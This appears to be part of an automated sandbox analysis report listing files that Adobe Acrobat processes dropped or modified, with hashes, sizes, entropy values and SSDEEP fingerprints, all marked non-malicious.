MD5: | 330986757DE1CBCB3D2D3F20693AC982 |
SHA1: | D07194D4625291D5CA0BF402828E5A4F2664D1FC |
SHA-256: | AF59ADDB1B73F07461BDD17AC31B7E8968D4373A008F3645D726922591C84443 |
SHA-512: | 23C3DB57CDD9442A06634A74894BBD58D664588C3325E34F9A38A6FF6020CF33C4BD8AC0BF77F0D0AC2C7CD84F3BB3C8558D73E0020ED65B46A51B69A4D985FE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.229338392671322 |
Encrypted: | false |
SSDEEP: | 6:iOn/wK+q2PqLTwi2nKuAl9OmbnIFUtF/wgmWZmwr/wgNVkwOqLTwi2nKuAl9Omb5:7n/wK+v8wZHAahFUtF/wRW/r/wMV5TwM |
MD5: | E48844B7F96BA795388132CDD6F729AE |
SHA1: | BDF3AB91CAD71EE1A4ACF5BF95E31BC5BA752546 |
SHA-256: | E7527C35C232A29C1C0F817CD1A6E58C2EF34817D7BD6295CF612B069BFEED0B |
SHA-512: | 9241108DB9F09E6D2A8A881C2CE626711D6361D09AFD9D49397E7FCD779628F8FF1EA1856A95E6374807E3BF5F66DA41CEBFCFB1F92B0B3A278195BE298541E8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.229338392671322 |
Encrypted: | false |
SSDEEP: | 6:iOn/wK+q2PqLTwi2nKuAl9OmbnIFUtF/wgmWZmwr/wgNVkwOqLTwi2nKuAl9Omb5:7n/wK+v8wZHAahFUtF/wRW/r/wMV5TwM |
MD5: | E48844B7F96BA795388132CDD6F729AE |
SHA1: | BDF3AB91CAD71EE1A4ACF5BF95E31BC5BA752546 |
SHA-256: | E7527C35C232A29C1C0F817CD1A6E58C2EF34817D7BD6295CF612B069BFEED0B |
SHA-512: | 9241108DB9F09E6D2A8A881C2CE626711D6361D09AFD9D49397E7FCD779628F8FF1EA1856A95E6374807E3BF5F66DA41CEBFCFB1F92B0B3A278195BE298541E8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 331 |
Entropy (8bit): | 5.158614593223318 |
Encrypted: | false |
SSDEEP: | 6:iOn/BRq2PqLTwi2nKuAl9Ombzo2jMGIFUtF/FZmwr/bskwOqLTwi2nKuAl9Ombzz:7n/zv8wZHAa8uFUtF/F/r/bs5TwZHAaU |
MD5: | 3F88A329086115A81D805956467D446E |
SHA1: | DE0783D5CCFE6082AA795FC02E13999FC10F7EB6 |
SHA-256: | 8F1CC03E093FD9CCC797715DE56FDDE6BB59AB2DB3FF7B617D4CF715ACDCD442 |
SHA-512: | 31F98803CDCD68DB5FA67804F6F35D41DB31A800CDC484C82553C4244A4D1E929CEFA51E889650D849FA0524924B923F4C45DD75DD4BF33798FFB987A846E5D7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 331 |
Entropy (8bit): | 5.158614593223318 |
Encrypted: | false |
SSDEEP: | 6:iOn/BRq2PqLTwi2nKuAl9Ombzo2jMGIFUtF/FZmwr/bskwOqLTwi2nKuAl9Ombzz:7n/zv8wZHAa8uFUtF/F/r/bs5TwZHAaU |
MD5: | 3F88A329086115A81D805956467D446E |
SHA1: | DE0783D5CCFE6082AA795FC02E13999FC10F7EB6 |
SHA-256: | 8F1CC03E093FD9CCC797715DE56FDDE6BB59AB2DB3FF7B617D4CF715ACDCD442 |
SHA-512: | 31F98803CDCD68DB5FA67804F6F35D41DB31A800CDC484C82553C4244A4D1E929CEFA51E889650D849FA0524924B923F4C45DD75DD4BF33798FFB987A846E5D7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0a7ec92a-02ca-4b8c-80e3-ca015cc381da.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.969760522051925 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqveSsBdOg2HS5Zcaq3QYiub5P7E4T3y:Y2sRdsxdMHSu3QYhbt7nby |
MD5: | 27438E25B701DF19B5F69E835AE8738D |
SHA1: | 491E134055B35E80C301DB6E28F28EE5E114ACC2 |
SHA-256: | DF4FFB65DC9B25975BDFDEAF4C579D9FCB942B838E1B0A6496EBDE69956474EF |
SHA-512: | 7B9137A68391EDC9C661E3CDEB68087FFA3893F857002A1B2E2E759DF6F355D3C22B9D687547E592D2F29BBEFB7B7FEE0C9C276826D326840955FC9D05044396 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969760522051925 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqveSsBdOg2HS5Zcaq3QYiub5P7E4T3y:Y2sRdsxdMHSu3QYhbt7nby |
MD5: | 27438E25B701DF19B5F69E835AE8738D |
SHA1: | 491E134055B35E80C301DB6E28F28EE5E114ACC2 |
SHA-256: | DF4FFB65DC9B25975BDFDEAF4C579D9FCB942B838E1B0A6496EBDE69956474EF |
SHA-512: | 7B9137A68391EDC9C661E3CDEB68087FFA3893F857002A1B2E2E759DF6F355D3C22B9D687547E592D2F29BBEFB7B7FEE0C9C276826D326840955FC9D05044396 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.222131203729073 |
Encrypted: | false |
SSDEEP: | 96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068OzlsHL8:1CDLCmPj8j0/8qKgwPHYPx8xemT8Ozlh |
MD5: | AB40D8A047D1F86E97A047A019EFA6B4 |
SHA1: | F1D4CA9A6BAEE7739468291E5B74974D9F0B2FBD |
SHA-256: | 45525E2D097A670B8DE6BFD2610960EA1A79E28E0C550BD8E7EEBC957B772901 |
SHA-512: | D5C37D76F799C59F5D0B54AF7DA5F0DBAE0312FD2E1140FCAE727AF0C5FCF525FC0B0EB540082C0D3B367C9E780DC0D799B214FEC0FD0EADE93F4659C2586779 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 319 |
Entropy (8bit): | 5.153288172783338 |
Encrypted: | false |
SSDEEP: | 6:iOn/GIq2PqLTwi2nKuAl9OmbzNMxIFUtF/iMZmwr/+kwOqLTwi2nKuAl9OmbzNMT:7n/GIv8wZHAa8jFUtF/n/r/+5TwZHAab |
MD5: | ADF3D5F4B76460A6626AA35AFC3822AB |
SHA1: | 5E545C9F7449E5313FA7B65DCA55044A513AEF59 |
SHA-256: | 0FD102083E00D6A200B7B411A82443F9A5495CF563A340F66273D9AE075AEFAD |
SHA-512: | 791373A985AC1B30727C3498F3DC8B1A5FDBBA5749521CA3EBF0DD1DA42A112236BF677D810BF38E921BF450DA27DCDEFD5EFAC4F0609B446A5F5E34A0B09B39 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 319 |
Entropy (8bit): | 5.153288172783338 |
Encrypted: | false |
SSDEEP: | 6:iOn/GIq2PqLTwi2nKuAl9OmbzNMxIFUtF/iMZmwr/+kwOqLTwi2nKuAl9OmbzNMT:7n/GIv8wZHAa8jFUtF/n/r/+5TwZHAab |
MD5: | ADF3D5F4B76460A6626AA35AFC3822AB |
SHA1: | 5E545C9F7449E5313FA7B65DCA55044A513AEF59 |
SHA-256: | 0FD102083E00D6A200B7B411A82443F9A5495CF563A340F66273D9AE075AEFAD |
SHA-512: | 791373A985AC1B30727C3498F3DC8B1A5FDBBA5749521CA3EBF0DD1DA42A112236BF677D810BF38E921BF450DA27DCDEFD5EFAC4F0609B446A5F5E34A0B09B39 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.43844215104751 |
Encrypted: | false |
SSDEEP: | 384:Sebci5GliBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:UpurVgazUpUTTGt |
MD5: | 1CEEDF03F0717ACCD53B7D1567E5EBF0 |
SHA1: | 09046475604CFFF90C67898B6895AE6E1936A290 |
SHA-256: | 1625A86EEB02E040E0A4105BDE2A0F63B55CB805B03BCD359EFBA11124C2A718 |
SHA-512: | E758A1D6A5804A5C9A8A8839F5782264382FB775D0D636B6D522E031EB96CD22BD3656395A3D9B091EA588009F4FA3411E9E2A927C1E5D1311139B2EF855CE48 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.214842878792735 |
Encrypted: | false |
SSDEEP: | 24:7+te56wKNpqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MI:7M8WNpqPmFTIF3XmHjBoGGR+jMz+Lh9 |
MD5: | A21315BA9DE8054BA8D40025AC92EBBE |
SHA1: | A14CBD08BDF10343F92FE81F82D4517C26BABD46 |
SHA-256: | 8A23AC4F25C2BCD8D8EFCF1F102D3ECC0129A11E09D804C16A683B7E60980715 |
SHA-512: | A16F6C0287DA86437910F212E04B0CC075D691D915FB324596C484A1156E1BDF2DF55936327C14F1C51C81CC35B22C1D1C9A174930D37586ACB352967F550F4D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFklLosjNttfllXlE/HT8kqBl/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKbsjNteT8Vl7NMa8RdWBwRd |
MD5: | BFF10390AAFBCC7157DE7FE0AA70EE04 |
SHA1: | FB2ABC171CF6E320D508BE090D2187126535DAF5 |
SHA-256: | 15001738C6242E6118BF559C8D618244AC85B6A28F7007959D0DFDF23E45ECDF |
SHA-512: | 6861FE1C4D6C61BE0C4A2579647FAF025B3143FD1DFB844B0FB5A0A76ED47F7A41E0320D73AE6893D08EE0394275468E6A8B0E81D9F50AA60A072AA0EFBECF03 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.236892865807448 |
Encrypted: | false |
SSDEEP: | 6:kKYsL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:piDImsLNkPlE99SNxAhUe/3 |
MD5: | E9609C03621ADFDBCA9C9F4E3099D8E4 |
SHA1: | 2F2802903EDE0B39BE780F9F3E827ADAF3760766 |
SHA-256: | 18FD219F302A6FBB91F48A1692F1AEEC75DAEF1CD945A8F0A841C2744CED5493 |
SHA-512: | AABEAD8CE58545ECF3F3C8EA609DFF0FF419CCE72B973202CBB43DFCEA077EC2C166BE21E10BE2E35012994FD8AAF7AF04DCAD66E31A143CE8B179E2E8E144B3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.366013861912395 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJM3g98kUwPeUkwRe9:YvXKXB57eOrT5LjIP9eGMbLUkee9 |
MD5: | BC67B9076882ADAB923A73BDE5C9CEA6 |
SHA1: | E9C07B47A9622FFE2299745188DDF9EB30E9E4E9 |
SHA-256: | 8F6A02965C3C68EAA0885707FBD237BDEA42CA9AD2D62EA2B5775A77B6A457CC |
SHA-512: | F19CD7E2EBFA0AC02103068417C73D167115361A86EFF7C947ED04AF0F4F38D7F5842A7620A6D75065D199B2A3010FACC294AB64AE1980B17863D7F6BB37544F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.319561797696151 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfBoTfXpnrPeUkwRe9:YvXKXB57eOrT5LjIP9eGWTfXcUkee9 |
MD5: | 7FC3BCD6BE5D0A2FDBF12F589AFF4DC4 |
SHA1: | F5B4829730C8BBC2FD30DEED1290BAF377EDC8FE |
SHA-256: | 755D02F776E6B92CDB7F59DD21F13E81DE33636F55B6C548F16F7A3EB4817B80 |
SHA-512: | 7E1D2C80B6A5D48CC00773AB7B281166740677632BE5D15467381C16F47B28F06312D423EDB2A400948B2E3DCCC881EA43710C53CADD24A60ABB9DD3ADDB85F0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.297821293053958 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfBD2G6UpnrPeUkwRe9:YvXKXB57eOrT5LjIP9eGR22cUkee9 |
MD5: | E98318DD78E3903FD2CD82711987EC39 |
SHA1: | F25BFD7C39C84C9101AB3002D343179A3DA39731 |
SHA-256: | B63217A9464B1EDA7E69AB733DBD5B74EDE1CAA4A89C579CBD2F7A83A52E4060 |
SHA-512: | CC8BC8A0FD4A79B512F4FD424D2631E8A08C08CDBA3815CE55A19C74CA63F498C05747B35A37DDB55E63AC6AB02B927FDE2AA0607E72461EDDFED2B25CB03131 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.347108893614827 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfPmwrPeUkwRe9:YvXKXB57eOrT5LjIP9eGH56Ukee9 |
MD5: | 8DBFA9987A73EB6687E11FD9744B6CFC |
SHA1: | C60E8FD835A7387606E979E911C52BE538A47B20 |
SHA-256: | 8655CA40537B34B992938833DF62E89023C13F7EB61AD503CC765F6C967B7668 |
SHA-512: | D7467881A6903E59D8C8CA6BCBC8AB7CF33870EEABFBEB973516E7C4BB00AE29CABA48D263C89A003446527B67B5E17CCC1F6045370104764CB4929385E5AA6F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.700590977959121 |
Encrypted: | false |
SSDEEP: | 24:Yv6XB5amT5XIVrpLgE9cQx8LennAvzBvkn0RCmK8czOCCSIn:YvEceXUhgy6SAFv5Ah8cv/In |
MD5: | 5FE7DC9EE9FA003C04072DC0C042FA76 |
SHA1: | 4168C1040B8994684F4102AD922A66867ACCC7FD |
SHA-256: | 171E88A1207236A445C866E78ADBDB1FD0651F2660F5277C932F75C136812056 |
SHA-512: | 9BDF0E599F9628169A964C8AC8B8246C0C64F526DF877053A96501CE74EBD6BBF7CAC773EF15449907E3EC84E0C4B777A8C26D135EAE56735503B02FB4636C53 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.321555287782919 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJf8dPeUkwRe9:YvXKXB57eOrT5LjIP9eGU8Ukee9 |
MD5: | CE59C53F0D5577974D2CB9B707F93411 |
SHA1: | C743B5B6DF8606A0F49DB8DE817B5431EBCE8AB8 |
SHA-256: | C4BF24943EB23D7B66D34F83977AFCF91A403774893181C839BFBF28C6211078 |
SHA-512: | 72040F10F8BE01453AE402120C1F891990BC8518632773F45318D537E4EF5C3F53B6D65C4C4B3D93420ACCF3F632425B8EA8C299CF36204F87355270F53ED3C4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.312524857687153 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfQ1rPeUkwRe9:YvXKXB57eOrT5LjIP9eGY16Ukee9 |
MD5: | 703A29E270C128518413C4D1F30A0A94 |
SHA1: | 963BBEFC869FE3000531DBF693AD8E6CAD21AE0D |
SHA-256: | 4B3CCD38C5C953A9F5D9EA17DBD8A43BE255EA02F6641BE734013150D1E14DB6 |
SHA-512: | CB2079D7B78CEC211796CF5E54162649947D39268CCE6C811F73CFC60B657CD9B54B7CB21169B53D7779D2CD7D70C4F311D2B04D98D41F97AD63B126903F1BB6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.330792899615985 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfFldPeUkwRe9:YvXKXB57eOrT5LjIP9eGz8Ukee9 |
MD5: | C44970455F265C6B94281E5FC7B6AA71 |
SHA1: | FF6828F44773AC65836ECC2D27C107CB792DF056 |
SHA-256: | 500928DEDF92FF27DFB5FE0AC7256C9E51A8C71471B4C0172451660AEC225BC2 |
SHA-512: | 6BB216D7D0386AE50ECCAD72C2E3943FADC37D89D16F9B2D8E2484BD2B23B35D37F9D25FDC665E1BA2EBAEE6E2EEF794B4C3DA421DA4228D38EA70FF2C01DA8B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.348130469679307 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfzdPeUkwRe9:YvXKXB57eOrT5LjIP9eGb8Ukee9 |
MD5: | 93FD4E18DDB2CFBDEB712AFB70EA7FE4 |
SHA1: | 84A429FCA2E2BB2D10497302B1BD911E1C2CF45A |
SHA-256: | FA504877440D233E31EC1224974E27097778E09C1DEFBF4A12ACF1A5880945A6 |
SHA-512: | CC5E15E13A8DCD3816D38D189CB1F8620DB3FC0FAAEA2D8E03ADD28D5075B50AED60DA45EFB74BC74B33483FFBCAB5A3B48AC8E13DF50D4C6B357F7F6A359493 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.328765425026457 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfYdPeUkwRe9:YvXKXB57eOrT5LjIP9eGg8Ukee9 |
MD5: | 99CC4F0402A65FF1457F03DC5A291B2C |
SHA1: | EE92C769A3375357CD10D9F5BE22124736598155 |
SHA-256: | 37C05C64DDC516D8605A871BC4B22117DB0826DADF330F8EAE6613EF9A5361C7 |
SHA-512: | 39CA8C86F5650A1BDB1C4CD6F1D6EED39C1EF2B504CAF9C69A9A004397A88B500DF03C3D425D68EDC6D1F86CF2F3981E188D7BDB89BDE273208224D2CEF99764 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.315322231388529 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJf+dPeUkwRe9:YvXKXB57eOrT5LjIP9eG28Ukee9 |
MD5: | F16AD2B6E90AFE7CE804EE548073D519 |
SHA1: | 6F734A062E041CCA9ED8329C14A1B3E11BDDE2F0 |
SHA-256: | 0CAB4EE04EBBA68F5FBFE25FC23C0F44DCD769CB3AE695EC96D0696009338133 |
